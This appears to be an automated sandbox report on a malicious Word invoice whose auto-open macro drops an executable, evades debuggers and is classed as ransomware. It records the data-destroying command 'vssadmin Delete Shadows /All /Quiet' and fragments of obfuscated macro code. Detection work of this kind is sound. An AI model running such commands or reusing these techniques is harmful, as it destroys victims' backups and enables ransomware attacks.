Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	File created: C:\Users\admin\AppData\Local\Temp\ladybi.exe
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	File created: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\r34f3345g[1].exe

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: 3_2_0040D530 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_0040D530

Generates new code (likely due to unpacking of malware or shellcode)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code execution: Found new code

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00407CC4 FindFirstFileW,FindNextFileW,FindClose,	3_2_00407CC4
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00405D6E FindFirstFileW,FindClose,	3_2_00405D6E
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_1_00405D1F RegisterWindowMessageA,OffsetRect,GetWindowThreadProcessId,GetClassInfoExW,ShowWindow,GetSidSubAuthority,GetKeyboardLayout,GetClassInfoW,FindFirstFileW,LoadCursorA,RegLoadKeyA,FillRect,LoadMenuA,RegQueryValueA,mouse_event,RegCloseKey,GetKernelObjectSecurity,ModifyMenuW,RegDeleteKeyA,RegSetValueExA,GetSidSubAuthorityCount,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,GetSecurityDescriptorDacl,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,IsWindowVisible,GetLongPathNameA,GetLongPathNameA,CharLowerW,RegSetValueA,GetSidLengthRequired,GetCaretPos,GetClassNameA,CloseClipboard,SetClipboardData,LoadCursorFromFileW,InitializeAcl,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,GetProcessWindowStation,RegFlushKey,MakeSelfRelativeSD,ShowCaret,SetSecurityDescriptorSacl,GetUserNameW,OpenEventLogW,CreateDesktopW,TranslateMDISysAccel,GetParent,ClientToScreen,CreateDialogIndirectParamW,GrayStringW,	3_1_00405D1F

System Summary:

Executable creates window controls seldom found in malware

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Window found: window name: SysTabControl32

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems

Binary contains paths to debug symbols

Show sources

Source:	Binary string: wwintl.pdb source: WINWORD.EXE
Source:	Binary string: msointl.pdbvsplab1\otools\BBT_TEMP\MSOINTLO.pdb source: WINWORD.EXE
Source:	Binary string: wwintl.pdbevsplab1\otools\BBT_TEMP\WWINTLO.pdb source: WINWORD.EXE
Source:	Binary string: vsplab1\otools\BBT_TEMP\MSOINTLO.pdb source: WINWORD.EXE
Source:	Binary string: evsplab1\otools\BBT_TEMP\WWINTLO.pdb source: WINWORD.EXE
Source:	Binary string: msointl.pdb source: WINWORD.EXE

Binary contains paths to development resources

Show sources

Source: WINWORD.EXE

Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K

Classification label

Show sources

Source: classification engine

Classification label: mal88.evad.expl.rans.winDOC@6/46@8/6

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

File created: C:\Users\admin\Application Data\Microsoft\Forms

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

File created: C:\Users\admin\AppData\Local\Temp\~DF2E88630B91EB61E4.TMP

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: invoice_J-98148270.doc

OLE indicator, Word Document stream: true

Found command line output

Show sources

Source: C:\Windows\System32\vssadmin.exe

Console Write: .......................................w..0.............h...}0..............................X...............S<l.........

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

SQL strings found in memory and binary data

Show sources

Source: WINWORD.EXE

Binary or memory string: SELECT * FROM <S>TOPICSSTATUSREADYMSACCESS.EXEEXCEL.EXEMSQRY32.EXEMDBMDEXLSQRY;DQYMSACCESSEXCELMSQUERY[OpenDatabase <s>, 0, 0][Open("<s>", 3,FALSE,,,,TRUE)][Open('<s>')][UserControl('&Return Data to Microsoft Word', 3, <i>)][OPEN<s>", 0, 1][ACTIVATE("<s>")][Ma

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Source: unknown	Process created: C:\Users\admin\AppData\Local\Temp\ladybi.exe
Source: unknown	Process created: C:\Windows\System32\vssadmin.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process created: C:\Users\admin\AppData\Local\Temp\ladybi.exe C:\Users\admin\AppData\Local\Temp\ladybi.exe
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32

Contains functionality to launch a process as a different user

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

3_1_00405D1F

Document contains embedded VBA macros

Show sources

Source: invoice_J-98148270.doc

OLE indicator, VBA macros: true

Document contains summary information with irregular field values

Show sources

Source: invoice_J-98148270.doc	OLE document summary: title field not present or empty
Source: invoice_J-98148270.doc	OLE document summary: edited time not present or 0

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: String function: 0040E160 appears 37 times

Reads the hosts file

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	File read: C:\Windows\System32\drivers\etc\hosts

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: invoice_J-98148270.doc

OLE, VBA macro line: Sub autoopen()

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: invoice_J-98148270.doc	OLE, VBA macro line: Set KogdaGe_1 = CreateObject(DrinkSun(0))
Source: invoice_J-98148270.doc	OLE, VBA macro line: Set KogdaGe_2 = CreateObject(DrinkSun(1))
Source: invoice_J-98148270.doc	OLE, VBA macro line: Set KogdaGe_6 = CreateObject(DrinkSun(2))
Source: invoice_J-98148270.doc	OLE, VBA macro line: Set hokuk = CreateObject(DrinkSun(3))
Source: invoice_J-98148270.doc	OLE, VBA macro line: Set KogdaGe_3 = hokuk.Environment(DrinkSun(4))

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: ladybi.exe	Binary or memory string: Shell_TrayWnd@
Source: ladybi.exe	Binary or memory string: Progman
Source: ladybi.exe	Binary or memory string: Program Manager
Source: ladybi.exe	Binary or memory string: Shell_TrayWnd

Contains functionality to simulate mouse events

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

3_1_00405D1F

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: SetErrorMode,SetUnhandledExceptionFilter,GetCurrentProcess,OpenProcessToken,SetTokenInformation,CloseHandle,GetModuleHandleA,GetProcAddress,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,CopyFileW,RegSetValueExA,DeleteFileW,RegSetValueExA,RegOpenKeyExA,WaitForSingleObject,RegSetValueExA,RegDeleteValueA,RegCloseKey, svchost.exe		3_2_00403BF5
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: SetErrorMode,SetUnhandledExceptionFilter,GetCurrentProcess,OpenProcessToken,SetTokenInformation,CloseHandle,GetModuleHandleA,GetProcAddress,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,CopyFileW,RegSetValueExA,DeleteFileW,RegSetValueExA,RegOpenKeyExA,WaitForSingleObject,RegSetValueExA,RegDeleteValueA,RegCloseKey, svchost.exe		3_2_00403BF5

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Network Connect: 190.9.32.8 80

Anti Debugging:

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00403BF5 SetErrorMode,SetUnhandledExceptionFilter,GetCurrentProcess,OpenProcessToken,SetTokenInformation,CloseHandle,GetModuleHandleA,GetProcAddress,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,CopyFileW,RegSetValueExA,DeleteFileW,RegSetValueExA,RegOpenKeyExA,WaitForSingleObject,RegSetValueExA,RegDeleteValueA,RegCloseKey,	3_2_00403BF5
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_0040B6B3 SetUnhandledExceptionFilter,	3_2_0040B6B3
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00403BF5 SetErrorMode,SetUnhandledExceptionFilter,GetCurrentProcess,OpenProcessToken,SetTokenInformation,CloseHandle,GetModuleHandleA,GetProcAddress,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,CopyFileW,RegSetValueExA,DeleteFileW,RegSetValueExA,RegOpenKeyExA,WaitForSingleObject,RegSetValueExA,RegDeleteValueA,RegCloseKey,	3_2_00403BF5
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_0040C7BC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040C7BC
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_0040B1C1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0040B1C1

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

System information queried: KernelDebuggerInformation

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: 3_2_00406F53 rdtsc

3_2_00406F53

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: 3_2_0040C7BC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0040C7BC

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: 3_2_0040D530 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_0040D530

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00407CC4 FindFirstFileW,FindNextFileW,FindClose,	3_2_00407CC4
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00405D6E FindFirstFileW,FindClose,	3_2_00405D6E
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_1_00405D1F RegisterWindowMessageA,OffsetRect,GetWindowThreadProcessId,GetClassInfoExW,ShowWindow,GetSidSubAuthority,GetKeyboardLayout,GetClassInfoW,FindFirstFileW,LoadCursorA,RegLoadKeyA,FillRect,LoadMenuA,RegQueryValueA,mouse_event,RegCloseKey,GetKernelObjectSecurity,ModifyMenuW,RegDeleteKeyA,RegSetValueExA,GetSidSubAuthorityCount,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,GetSecurityDescriptorDacl,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,IsWindowVisible,GetLongPathNameA,GetLongPathNameA,CharLowerW,RegSetValueA,GetSidLengthRequired,GetCaretPos,GetClassNameA,CloseClipboard,SetClipboardData,LoadCursorFromFileW,InitializeAcl,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,GetProcessWindowStation,RegFlushKey,MakeSelfRelativeSD,ShowCaret,SetSecurityDescriptorSacl,GetUserNameW,OpenEventLogW,CreateDesktopW,TranslateMDISysAccel,GetParent,ClientToScreen,CreateDialogIndirectParamW,GrayStringW,	3_1_00405D1F

Checks the free space of harddrives

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: 3_2_00406F53 rdtsc

3_2_00406F53

Found evasive API chain (may stop execution after checking a module file name)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_3-8196

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 740	Thread sleep time: -60000ms >= -60000ms
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 740	Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\vssadmin.exe TID: 3784	Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\svchost.exe TID: 3580	Thread sleep time: -60000ms >= -60000ms

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_1_00405D1F RegisterWindowMessageA,OffsetRect,GetWindowThreadProcessId,GetClassInfoExW,ShowWindow,GetSidSubAuthority,GetKeyboardLayout,GetClassInfoW,FindFirstFileW,LoadCursorA,RegLoadKeyA,FillRect,LoadMenuA,RegQueryValueA,mouse_event,RegCloseKey,GetKernelObjectSecurity,ModifyMenuW,RegDeleteKeyA,RegSetValueExA,GetSidSubAuthorityCount,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,GetSecurityDescriptorDacl,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,IsWindowVisible,GetLongPathNameA,GetLongPathNameA,CharLowerW,RegSetValueA,GetSidLengthRequired,GetCaretPos,GetClassNameA,CloseClipboard,SetClipboardData,LoadCursorFromFileW,InitializeAcl,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,GetProcessWindowStation,RegFlushKey,MakeSelfRelativeSD,ShowCaret,SetSecurityDescriptorSacl,GetUserNameW,OpenEventLogW,CreateDesktopW,TranslateMDISysAccel,GetParent,ClientToScreen,CreateDialogIndirectParamW,GrayStringW,	3_1_00405D1F
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_1_00405D1F RegisterWindowMessageA,OffsetRect,GetWindowThreadProcessId,GetClassInfoExW,ShowWindow,GetSidSubAuthority,GetKeyboardLayout,GetClassInfoW,FindFirstFileW,LoadCursorA,RegLoadKeyA,FillRect,LoadMenuA,RegQueryValueA,mouse_event,RegCloseKey,GetKernelObjectSecurity,ModifyMenuW,RegDeleteKeyA,RegSetValueExA,GetSidSubAuthorityCount,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,GetSecurityDescriptorDacl,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,IsWindowVisible,GetLongPathNameA,GetLongPathNameA,CharLowerW,RegSetValueA,GetSidLengthRequired,GetCaretPos,GetClassNameA,CloseClipboard,SetClipboardData,LoadCursorFromFileW,InitializeAcl,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,GetProcessWindowStation,RegFlushKey,MakeSelfRelativeSD,ShowCaret,SetSecurityDescriptorSacl,GetUserNameW,OpenEventLogW,CreateDesktopW,TranslateMDISysAccel,GetParent,ClientToScreen,CreateDialogIndirectParamW,GrayStringW,	3_1_00405D1F
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_1_00403139 SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,CloseClipboard,LoadCursorFromFileW,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,RegFlushKey,MakeSelfRelativeSD,GetUserNameW,IsWow64Process,CreateDialogIndirectParamW,GrayStringW,FindWindowW,InSendMessage,OpenClipboard,AddAce,IsWindow,DrawStateA,RegCreateKeyExW,GetLastActivePopup,DialogBoxParamA,PostThreadMessageW,RegOpenKeyExA,GetWindowWord,IsDialogMessageA,DrawIconEx,MakeAbsoluteSD,RegSetValueW,LoadMenuW,GetMenuState,DrawTextExA,GetScrollPos,GetDlgItem,GetClipboardFormatNameW,InitiateSystemShutdownA,ValidateRgn,LookupPrivilegeValueA,ShowWindow,RegLoadKeyA,FillRect,LoadMenuA,GetKernelObjectSecurity,ModifyMenuW,RegSetValueExA,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,GetClassNameA,CloseClipboard,SetClipboardData,InitializeAcl,DialogBoxIndirectParamA,MakeSelfRelativeSD,Sh	3_1_00403139
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_1_00403139 SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,CloseClipboard,LoadCursorFromFileW,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,RegFlushKey,MakeSelfRelativeSD,GetUserNameW,IsWow64Process,CreateDialogIndirectParamW,GrayStringW,FindWindowW,InSendMessage,OpenClipboard,AddAce,IsWindow,DrawStateA,RegCreateKeyExW,GetLastActivePopup,DialogBoxParamA,PostThreadMessageW,RegOpenKeyExA,GetWindowWord,IsDialogMessageA,DrawIconEx,MakeAbsoluteSD,RegSetValueW,LoadMenuW,GetMenuState,DrawTextExA,GetScrollPos,GetDlgItem,GetClipboardFormatNameW,InitiateSystemShutdownA,ValidateRgn,LookupPrivilegeValueA,ShowWindow,RegLoadKeyA,FillRect,LoadMenuA,GetKernelObjectSecurity,ModifyMenuW,RegSetValueExA,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,GetClassNameA,CloseClipboard,SetClipboardData,InitializeAcl,DialogBoxIndirectParamA,MakeSelfRelativeSD,Sh	3_1_00403139
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_1_00403139 SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,CloseClipboard,LoadCursorFromFileW,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,RegFlushKey,MakeSelfRelativeSD,GetUserNameW,IsWow64Process,CreateDialogIndirectParamW,GrayStringW,FindWindowW,InSendMessage,OpenClipboard,AddAce,IsWindow,DrawStateA,RegCreateKeyExW,GetLastActivePopup,DialogBoxParamA,PostThreadMessageW,RegOpenKeyExA,GetWindowWord,IsDialogMessageA,DrawIconEx,MakeAbsoluteSD,RegSetValueW,LoadMenuW,GetMenuState,DrawTextExA,GetScrollPos,GetDlgItem,GetClipboardFormatNameW,InitiateSystemShutdownA,ValidateRgn,LookupPrivilegeValueA,ShowWindow,RegLoadKeyA,FillRect,LoadMenuA,GetKernelObjectSecurity,ModifyMenuW,RegSetValueExA,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,GetClassNameA,CloseClipboard,SetClipboardData,InitializeAcl,DialogBoxIndirectParamA,MakeSelfRelativeSD,Sh	3_1_00403139
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_1_00403139 SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,CloseClipboard,LoadCursorFromFileW,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,RegFlushKey,MakeSelfRelativeSD,GetUserNameW,IsWow64Process,CreateDialogIndirectParamW,GrayStringW,FindWindowW,InSendMessage,OpenClipboard,AddAce,IsWindow,DrawStateA,RegCreateKeyExW,GetLastActivePopup,DialogBoxParamA,PostThreadMessageW,RegOpenKeyExA,GetWindowWord,IsDialogMessageA,DrawIconEx,MakeAbsoluteSD,RegSetValueW,LoadMenuW,GetMenuState,DrawTextExA,GetScrollPos,GetDlgItem,GetClipboardFormatNameW,InitiateSystemShutdownA,ValidateRgn,LookupPrivilegeValueA,ShowWindow,RegLoadKeyA,FillRect,LoadMenuA,GetKernelObjectSecurity,ModifyMenuW,RegSetValueExA,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,GetClassNameA,CloseClipboard,SetClipboardData,InitializeAcl,DialogBoxIndirectParamA,MakeSelfRelativeSD,Sh	3_1_00403139

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
